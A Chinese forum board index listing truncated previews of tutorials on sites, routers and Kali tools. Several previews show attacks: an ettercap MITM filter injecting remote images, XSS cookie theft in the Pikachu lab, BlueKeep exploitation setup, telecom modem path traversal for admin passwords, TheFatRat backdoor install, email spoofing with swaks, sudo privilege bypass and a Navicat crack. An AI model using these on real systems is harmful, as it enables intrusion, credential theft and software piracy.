建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
366个主题在此版面
-
现在无论是那种自媒体,都有点赞的功能。而一篇文章的赞越多相应的会得到相关的流量和推广。你知道关于赞是如何实现的吗? 什么是COOKIECookie实际上是一小段的文本信息(key-value格式)。客户端向服务器发起请求,如果服务器需要记录该用户状态,就使用response向客户端浏览器颁发一个Cookie。客户端浏览器会把Cookie保存起来。当浏览器再请求该网站时,浏览器把请求的网址连同该Cookie一同提交给服务器。服务器检查该Cookie,以此来辨认用户状态。 举个例子,加入你的电话丢了。当你买个新手机后要去办卡。这是我们只拿着sfz去补办就行了。因为之前你办卡时,系统中已存放了你的相关的信息。无需录入新的信息! 基于Cookie的点赞这里我已我的博客为例,如文章《树莓派4B搭建自己的FM电台》当前的点赞数为2赞。当我点赞后无法连续点赞。 而后,清楚浏览器缓存后。在尝试点赞。 可以发现,又能点赞了。这是什么原因呢? 原来,当我们点击点赞按钮后,我们的浏览器会存在cookie数据。当我们再次点赞时,cookie数据已经存在了,故不能连续点赞。反之,当我们清除了浏览器存放的cookie数据,便可以再次点赞。那么?能不能不要每次都手动清除浏览器数据,而自动刷赞呢? 分析数据包我们在burp中抓包,看看数据的请求是怎样的。 点击点赞按钮,抓取数据包。 可以看到,我们的cookie是编码的。右键Send to decode对编码解码 原数据 Cookie: __51uvsct__JJhdkR8L54ZwvuFw=13; __51vck…
-
- 0 篇回复
- 37 次查看
-
-
Navicat Premium是一个很好的数据库管理工具。将此工具连接到一个数据库,在那里您可以看到各种数据库的详细信息。这包括报告错误,等等。当然,还可以通过他登录数据库,进行各种操作。Navicat Premium是一个多链接的数据库管理工具,允许您在一个程序中同时连接到MySQL, SQLite, Oracle和PostgreSQL数据库,使它更容易管理不同类型的数据库。版本Navicat Premium 16.0.10 下载官网下载地址:https://www.navicat.com.cn/products/navicat-premium Navicat Premium 16新增功能1、图表 Navicat 16提供了更多数据源和图表支持。我们非常注重提高可用性和可访问性,为你的工作提供至关重要的信息.。 2、数据生成 数据生成可帮助你创建大量测试数据。让你在相互关联的多个表中创建复杂的数据。 3、On-Prem Server现已添加到我们的 Navicat系列中。我们为你提供托管云环境的选项,在你所在的位置内部存储Navicat 对象。 4、连接配置文件 为外出用户配置多个连接配置文件,可根据使用的设备的当前位置切换连接设置。 5、生产力 Navicat 16具有众多功能和UI/UX改进,以满足你的数据库开发需求。为你提供构建、管理和维护数据库的新方法。 安装 破解Navicat 16.0.10目前尚未有注册机,但是我们可以利用清除注册表的方法。来延长试用期。当然你也可以下载16.0.x其他版本的破解版。 脚本如下: @ec…
-
- 0 篇回复
- 36 次查看
-
-
漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits…
-
- 0 篇回复
- 36 次查看
-
-
说实在的Pyhon在数据处理方面确实很牛。尤其是大数据的今天,我们和形形色色的数据形影不离。本文给大家介绍下利用百度OCR进行文字识别。实验环境Python (3.9.12)Kali Linux百度OCR 申请百度OCR访问百度智能云,开通API 网址:https://cloud.baidu.com/campaign/OCR202203/index.html 可以使用百度账号登录,使用百度登录的好处是,你可以把百度的实名认证直接迁移过来,就不需要再等几天人工审核了。 你可以选择免费试用,或者1块钱买1万次,我觉得没什么区别,都是够用的。 领取免费额度的时候要勾选接口类型,要不然是一片空白。 新建应用,获取token 在控制台-文字识别-概览中点击创建应用 应用归属选择个人,应用名称和概述就随便填 创建完成之后,进入应用列表,可以看到API Key和Secret Key,记下来。 文字识别根据官方示例,写了Python的简单列子。参考如下: from aip import AipOcr APP_ID = 'xxxxxx'#你的APP_ID API_KEY = 'xxxxxxxxx'#你的API_KEY SECRET_KEY = 'xxxxxxxx'#你的SECRET_KEY client = AipOcr(APP_ID, API_KEY, SECRET_KEY) def get_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() imag…
-
- 0 篇回复
- 35 次查看
-
-
视频不能播放的,用360或者GOOGLE浏览器查看本文! 什么是xssXSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 XSS攻击类型危害:存储型 > 反射型 > DOM型 反射型:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型:交互的数据会被存在数据库里面,永久性存储,一般出现在留言板,注册等页面 DOM型:不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性,也属于反射型 XSS形成原因形成XSS漏洞的主要原因是程序中输入和输出的控制不够严格。导致“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行 反射型XSS(get)我们首先打开Pikachu右键审查元素。 我们看到对文本框的最大长度做出了限制,修改maxlength="20"即可。 payload <script>alert("kali博客")</script> 可以干什么——盗取Cookie修改/pikachu/pkxss/inc/config.inc.php 中的数据库信息访问 http://localhost/pikachu ,访问管理工具里的XSS后台,初始化数据库。 登录到后台界面 修改/var/www/html/pikachu/pkxss/xcookie下的cookie.php,将IP地址改为漏洞服务器的地址 cooki…
-
- 0 篇回复
- 35 次查看
-
-
阿里云centos7配置https 一:下载证书1:下载apacher 环境下的证书 证书中文件的内容 确定无误后继续下一步 二:上传证书文1:先在Apache的根目录创建一个 cert 文件夹 命令: cd /etc/httpd mkdir cert创建完成后,将所有的证书文件上传该目录下 三:安装OpenSSL命令: yum install mod_ssl openssl安装完成后开始配置ssl 命令: vim /etc/httpd/conf.d/ssl.conf DocumentRoot "/var/www/html" (去掉前面的#号) ServerName www.bbskali.cn:443 (去掉前面#号 该为自己的域名) SSLHonorCipherOrder on(去掉#号)分别将 SSLCertificateFile cert/public.pem SSLCertificateKeyFile cert/214389704890210.key SSLCertificateChainFile cert/chain.pem 改为你自己的证书配置参数 cert 就是你刚才创建的文件 修改完成后!:wq 保存退出 四:配置Apache命令 vim /etc/httpd/conf/httpd.conf 先查找看有没有这条命令 LoadModule ssl_module modules/mod_ssl.so 如果没有直接插入一条到里面 然后查找这条命令 IncludeOptional conf.d/*.conf…
-
- 0 篇回复
- 35 次查看
-
-
设备清单天翼网关魅族路由器(老毛子固件)网线若干 路由模式一由于现在的光猫都支持wifi功能,所以很大程度上已经省略了路由器。但是由于光猫的WiFi功率比较小,有时候我们需要添加一个路由器,今天来看看如何添加路由器。 基于传统的宽带拨号方式(新旧光猫通用)先看看线路连接 光猫千兆口————路由WAN口 然后登陆路由器,配置上网方式为PPOP拨号填写宽带账号和密码,保存即可。 需要注意的是电信用户如果配置好不能上网的话,需要打人工客户激活下。 基于光猫路由一体的串联方式(适合新光猫)如果你的光猫支持WiFi功能,此时你可以将其看做是一个路由器。(说白了就是将猫和路由器合二为一) 这时,我们可以用最简单的方式连接路由器(二级路由器) 先看看线路 将路由器的上网方式设置为动态IP即可! 注意事项如果已经设置过拨号上网,请将光猫端口插到百兆口或iptv端口,因为千兆口已占用。修改你的路由器的DHCP服务器地址,不要和光猫的192.168.0.1/192.168.1.1冲突。
-
- 0 篇回复
- 35 次查看
-
-
环境说明centos (公网服务器)kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装centos系列 yum install nc -ydebian unbunt系列 apt-get install nc进行交互式聊天先开启服务器端 nc -l 5555然后我们开启客户端 nc 公网ip 5555 传输文件服务器端(接收端) nc -l 5555 > recv.txt发送端 nc 192.168.XXX.XXX 5555 < send.txt
-
- 0 篇回复
- 35 次查看
-
-
什么是光猫的telecomadmin家庭的光猫一般有两个账号,一个为useradmin另外一个为telecomadmin。前者为普通用户,密码光猫后面的铭牌上面写着,用户登录即可。而后者为超级管理员密码,一般为电信工作人员所有。前者登录后仅仅为普通用户,权限少,而后者权限大,可“为所欲为”。准备U盘一个burpsuite聪明的大脑 开始破解1,首先配置burp 打开浏览器,设置代理方式 127.0.0.1:8080 2,运行burp 3,插入U盘,暂时关闭代理, 并用useradmin登录光猫 4,点击菜单栏储存管理-点击进入U盘目录 5,开启代理,并点击返回上一级 6,可以看到,已经返回了相关的路径信息,我们随便输入目录测试下。 7,将path值改为path=/ 可以看到,我们成功返回了根目录/下的所有文件。 8,找到光猫的备份文件一般是.xml文件,不同的型号位置可能不一样。 9,将备份文件复制到U盘,打开查找telecomadmin 顺利得到密码 10,登录测试 Telecomadmin能干什么配置ipv6网络我们首先用超级管理员登录光猫,配置信息如下! 登录路由器,配置联网方式 配置ipv6信息 测试是否成功 获取静态ip因地区限制或宽带业务因素,在本环境尚未成功,理论是可以获取的。但要根据具体实际而定。 其他方面正在研究。
-
- 0 篇回复
- 35 次查看
-
-
一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击
-
- 0 篇回复
- 35 次查看
-
-
exe2hexbat是一个 Python 脚本,用于将 Windows PE 可执行文件转换为批处理文件,反之亦然。概述exe2hex 将可执行二进制文件编码为 ASCII 文本格式。然后,将结果传输到目标计算机(回显 ASCII 文件比回显二进制数据容易得多)。执行exe2hex的输出文件后,使用或PowerShell(默认情况下在Windows上预安装)还原原始程序。可以使用exe2hex中的内置 Telnet 或 WinEXE 选项自动将文件传输到目标计算机。 Binary EXE -> ASCII Text -> *Transfer* -> Binary EXE 快速开始-x 使用文件或 STDIN ( /path/to/binary-program.exe-s) -b 输出到 BATch /或 PoSH (-b file.bat-p powershell.cmd) 用法示例创建 BATch & PowerShell 文件: 这里我随便写了一个exe程序 exe2hex -x chao.exe 可以看到,exe2hex将exe文件转变成了cmd和bat文件。 在创建 BATch 文件之前压缩文件 exe2hex -x chao.exe -b nc.txt -cc [*] exe2hex v1.5.1 [i] Attempting to clone and compress [i] Creating temporary file /tmp/tmp509bq1bl [+] Compression (str…
-
- 0 篇回复
- 35 次查看
-
-
当我们偶尔来兴趣想要扫面某个IP,或者想要隐匿扫描IP时,想过nmap的替代品吗?今天本文将推荐5款优秀的网站。以供使用! 使用 Nmap在线扫描的缺点是无法像从终端使用Nmap那样,轻松地运行Nmap 脚本。但是,当前大多数 Nmap 在线扫描方案通常会针对,最流行的端口执行扫描。 01 IPV6Scanner顾名思义,IPV6Scanner.com是一个网络扫描器,它允许任何用户针对任何主机名、基于 IPV4 或 IPv6 的地址执行端口扫描。 其简单的界面只需要您填写目标并点击扫描 便可对最常见的服务器端口执行默认扫描。 02 Nmap.onlineNmap online它可能是最经典的Nmap-looking替代解决方案。基于Web的应用程序,而不是在终端上运行的应用程序。 它提供了一个简单的界面来扫描任何域或 IP 地址,您可以选择要执行的扫描类型,例如快速扫描、端口扫描、操作系统检测或跟踪路由。 扫描完成后,您将获得 Nmap 扫描结果,以与传统 Nmap 相同的方式显示打开、过滤和关闭的端口,如下所示: 扫描结果如下: 扫描类型说明: 快速扫描这可能是最常用的选项,因为它可以让您扫描前 100 个最常见的端口 端口扫描可让您对端口 21、22、25、80、110、143、443 和 445 执行 TCP 扫描,并启用服务检测,因此您可以获得有关远程运行服务的数据 操作系统检测允许您检测远程主机上运行的操作系统。 03 ShodanShodan 是一个搜索引擎,专注于对来自任何连接设备的数据进行索引,例如计算机、服务器、…
-
- 0 篇回复
- 35 次查看
-
-
下载系统镜像根据自己的系统环境,下载合适的版本。 下载时,建议用迅雷下载。比较稳定点。 下载完成后,打开工具win32磁盘映像工具,其他工具也行。 静待片刻…… 提示写入成功。 将卡拔掉,插入树莓派。连接网线通电! 确定ip地址登录路由器查看树莓派的ip,或者利用nmap扫描即可。 nmap -sL 192.168.123.1/24登录Kali这里我们用xshell登录树莓派,默认账号和密码分别为kali kali 如下,成功登录kali 其他事项配置vnc因为自己家境贫寒,买不起屏幕。用vnc远程连接。 在终端输入tightvncserver配置vnc连接密码。 连接vnc主机名:ip:1 密码:刚才自己输入的密码 注意ip后面必须填写:1 启动命令为 vncserver :1 设置root密码随着2022的到来,kali初始的root账号以禁用。而是更新了新的策略。即用户为普通用户kali 执行下面命令,修改root密码。 sudo su passwd root这样便设置了root账号和密码 设置中文在命令行输入dpkg-reconfigure locales。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.UTF-8,确定后,将en_US.UTF-8选为默认。 安装中文字体 apt-get install xfonts-intl-chinese apt-get install ttf-wqy-microhei在终端执行 echo LANG="zh_CN.UTF-…
-
- 0 篇回复
- 34 次查看
-
-
本教程中,您将学习如何在NodeMCU上使用DHT11温湿度传感器。并了解温湿度传感器的工作原理,以及如何通过串口监视器查看传感器读取的数值。 设备清单NodeMCU开发板一块DHT11温湿度传感器一个 (DHT11模块) (NodeMcu板子) DHT11是通过测量两个电极之间的电阻来检测水蒸汽的。湿度检测部件表面有电极的保湿基板。 当水蒸气被基板吸收时,离子被基板释放,这个过程将会增加电极之间的导电性。 两个电极之间的电阻变化与相对湿度成比例。 较高的相对湿度会降低电极之间的电阻,而较低的相对湿度会增加电极之间的电阻。 如何在NodeMCU上连接DHT11 将DHT11连接到NodeMCU是比较简单的,但连接方式有所不同,具体取决于您使用的是3个引脚的传感器还是4个引脚的传感器。 连接方式如下: DHT11上标有(+或VCC)引脚的连接nodemcu的+ 3V引脚。 DHT11上标有(S或OUT)引脚的连接nodemcu的D4V引脚。 DHT11上标有(-或GND)引脚的连接nodemcu的GND引脚。 代码如下#include <SimpleDHT.h> // for DHT11, // VCC: 5V or 3V // GND: GND // DATA: 2 int pinDHT11 = 2; SimpleDHT11 dht11(pinDHT11); void setup() { Serial.begin(115200); } void loop() { // start…
-
- 0 篇回复
- 34 次查看
-
-
自kali更新到2020版后,默认取消了root用户的登录权限。只能用普通用户登录,这样做的优点在于对于kali的新手,在不懂的部分命令的情况下对系统的损害有所降低,也就说安全性提高了。但是普通用户权限实在太低,习惯了root权限的我们在2020中如何设置登录密码呢? 重启系统,进入下面这个界面时按E 按↓到linux开头的一行。 修改ro quiet splash为rw quiet splash init=/bin/ 按F10保存后进入单用户模式 执行passwd root命令修改密码 然后重启,便可以用root身份登录了!
-
- 0 篇回复
- 34 次查看
-
-
前不久刚入手魅族路由器一台,今天让我们从其外观,功能等方面进行一次简单的测评。说说快递,顺丰快递。下单后两天就到货,很快! 恩,开箱(双手已饥渴难耐) 包装还可以…… 爆爆菊花 支持USB接口,两个wlan口,支持充电宝供电(适合没电的时候用) 插入网线,进行配置 配置过程可以在浏览器中输入192.168.232.1或者下载APP直接配置。 APP首页 插件列表 里面插件比较多,我就不再一一的说明 了。这里给大家演示下迅雷下载加速插件。 在正常情况下,(没有迅雷会员)下载速度 基本在2M左右,这个只是一个简单的测评,没有那么专业。只是和平时的下载速度相比较。 在接口处 插入U盘或者移动硬盘,我们可以查看U盘中的文件。当然也可以将远程文件下载到我们的U盘中。
-
- 0 篇回复
- 33 次查看
-
-
一:简介一个简单的工具来生成后门和简单的工具来开发攻击像浏览器攻击,dll。这个工具编译与流行的恶意软件的有效载荷,然后可以执行编译的恶意软件在windows上,android,mac。使用此工具创建的恶意软件也有一个能力绕过大部分杀毒软件保护。 安装git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh视频演示
-
- 0 篇回复
- 33 次查看
-
-
PyCharm是一个集成的Python开发环境工具。能够调试代码、生成和运行代码。Pycharm是python开发人员不可缺少的神器。环境要求最少 2 GB 内存,建议 8 GB 内存1024x768 最低屏幕分辨率Python 2.7,或 Python 3.5 或更高版本本文将在Kali 2022中进行安装。 下载安装包首先我们到PyCharm的官网下载安装包,https://www.jetbrains.com/pycharm/download/#section=windows 目前,Pycharm提供了三种不同操作系统的版本,这里我们选择KALI作为操作系统,所以点击Linux 选择社区版本,Download 等待下载完成后,我们将其复制到kali中去。 执行下面命令,对文件进行解压。 tar -zxvf pycharm-community-2022.1.3.tar.gz 运行cd bin #进入bin目录 ./同意协议 send anonymous ststistice 完美运行
-
- 0 篇回复
- 33 次查看
-
-
Arping用于发现计算机网络上的存活主机。通过对网段内的IP进行扫描,可以获取有关该地址的相关信息和存活状态。Arping 使用地址解析协议 (ARP) 在第 2 层(或 OSI 模型的链路层)运行工作,以探测主机。由于 ARP 不可路由,因此这仅适用于本地网络。 使用帮助arping -h ARPing 2.22, by Thomas Habets <[email protected]> usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w <sec> ] [ -W <sec> ] [ -S <host/ip> ] [ -T <host/ip ] [ -s <MAC> ] [ -t <MAC> ] [ -c <count> ] [ -C <count> ] [ -i <interface> ] [ -m <type> ] [ -g <group> ] [ -V <vlan> ] [ -Q <priority> ] <host/ip/MAC | -B> For complete usage info, use --help or check the manpage.参数释义-A:与-U参数类似,但是使用的是ARP REPLY包而非ARP REQUEST包。 …
-
- 0 篇回复
- 33 次查看
-
-
pumpkin3安装中各种遇到的问题,以及使用视频教程。 安装安装视频如下 欢迎关注本人B站 配置WiFi钓鱼页面激活钓鱼插件 set proxy captiveflask显示当前插件信息 proxies 可以看到,当前我们插件下启动了loginPage这个页面,如何启动其他页面呢? set captiveflask.Login_v4 true这样就启动了其他页面 钓鱼演示 钓鱼页面下载钓鱼页面 解压密码查看付费内容
-
- 0 篇回复
- 33 次查看
-
-
局部变量对于局部变量,只能在引用的函数中使用。而结束函数后,该变量也失去了意义。 全局变量顾名思义,全局变量就是在整个项目中都可以进行调用。但需要注意的是,在函数中是不能直接进行调用的,我们需要关键词globla进行声明就就可以了。 静态变量静态变量,其值是不会发生变化。通常用关键词static定义静态变量。 实例代码<?php /** 全局变量 、局部变量、静态变量。 **/ $c=6; $d=9; function bbs($a,$b){ echo "局部变量结果:" .$a*$b."</br>"; } ?> <?php function kali(){ global $c,$d; echo "全局变量结果:".$c*$d."</br>"; } ?> <?php function cn(){ static $f=1; echo "静态变量:".$f."</br>"; $f++; } ?> <?php bbs(7,7); kali(); cn(); cn(); ?>
-
- 0 篇回复
- 33 次查看
-
-
无需任何环境,便可获取服务器磁盘、内存、负载、等相关使用情况。使用方法vim bbskali.sh #创建sh文件,将下面的代码复制到里面。 chmod+x bbskali.sh #添加运行权限 bash bbskali.sh会在root目录下生成bbskali.html文件!浏览器打开即可! 效果代码#!/bin/bash ip=`ifconfig |grep -w inet |grep inet|grep -v 127 |awk '{print $2}'` a=`df -hT|grep -w "/"|awk '{print $1}'` b=`df -hT|grep -w "/"|awk '{print $2}'` c=`df -hT|grep -w "/"|awk '{print $3}'` d=`df -hT|grep -w "/"|awk '{print $4}'` e=`df -hT|grep -w "/"|awk '{print $5}'` f=`df -hT|grep -w "/"|awk '{print $6}'` g=`df -hT|grep -w "/"|awk '{print $7}'` #free-h neic=`free -h|grep -w "Mem"|awk '{print $1}'` total=`free -h|grep -w "Mem"|awk '{print $2}'` used=`free -h|grep -w "Mem"|awk '{print $3}'` free=`free -h|grep -…
-
- 0 篇回复
- 33 次查看
-
-
前面几期的文章中说过,如何利用花生壳等工具搭建内网映射。实现外网访问我们的内网,但是由于花生壳等软件不稳定而且慢最重要的是还有点小贵。由于笔者运维着几天服务器,就想着利用frp搭建内网穿透。 原理 前期准备vps服务器(必须)路由器(可选)树莓派(可选) 下载安装服务端- frps首先到 frp 的 releases 页面下载最新版的对应 VPS 的处理器架构的压缩包 https://github.com/fatedier/frp/releases 如何知道 VPS 的处理器架构?在 VPS 上运行这个命令: arch如果输出x86_64则需要下载带linux_amd64的那个压缩包; 如果输出的是其他的,则在文件列表中找 linux 的对应架构的压缩包 以x86_64架构举例 如果下载比较慢可以到https://file.kskxs.com/?dir=frp/frp-v0.32.1这里去下载 下载后,上传到服务器并解压,或者利用下面方式解决。 cd /root #下载 wget --no-check-certificate https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz #解压 tar -xzvf frp_0.33.0_linux_amd64.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.18.0_linux_amd64 frp cd frp #确保 frps 程序具有可执行…
-
- 0 篇回复
- 32 次查看
-
-
Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具, 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/牛刀小试kali下默认自带,无需安装。 01 测试邮箱的连通性 swaks --to [email protected] 返回250ok,说明该邮箱存在,并且可以正常收信。 利用SMTP发送邮件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码在测试之前,在163官网开启smtp 命令说明: --from [email protected] //发件人邮箱; --ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文; --header "Subject:hello" //邮件头信息,subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送 发送附件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 -…
-
- 0 篇回复
- 32 次查看
-
-
漏洞详情sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。使得非root用户不需要知道root密码,就可以执行root才能执行的命令。 系统平台kali-Linux 软件版本1.8.27 漏洞利用首先我们新建一个用户test 然后执行visudo命令添加规则,使得test用户可以执行任意命令 test ALL=(ALL:ALL) ALL 语法 sudo -u root 要执行的命令 示例:我们用直接用账号test查看/etc/shadow提示如下! 这是因为test是非root用户,不能查看有root权限的文件,但是我们执行下面命令: 切换用户su test $ sudo -u root cat /etc/shadow效果如下: 也就是说,在我们不知道root账号密码的情况下,我们执行的root命令。 漏洞修复更新sudo到最新版本1.8.28即可。
-
- 0 篇回复
- 32 次查看
-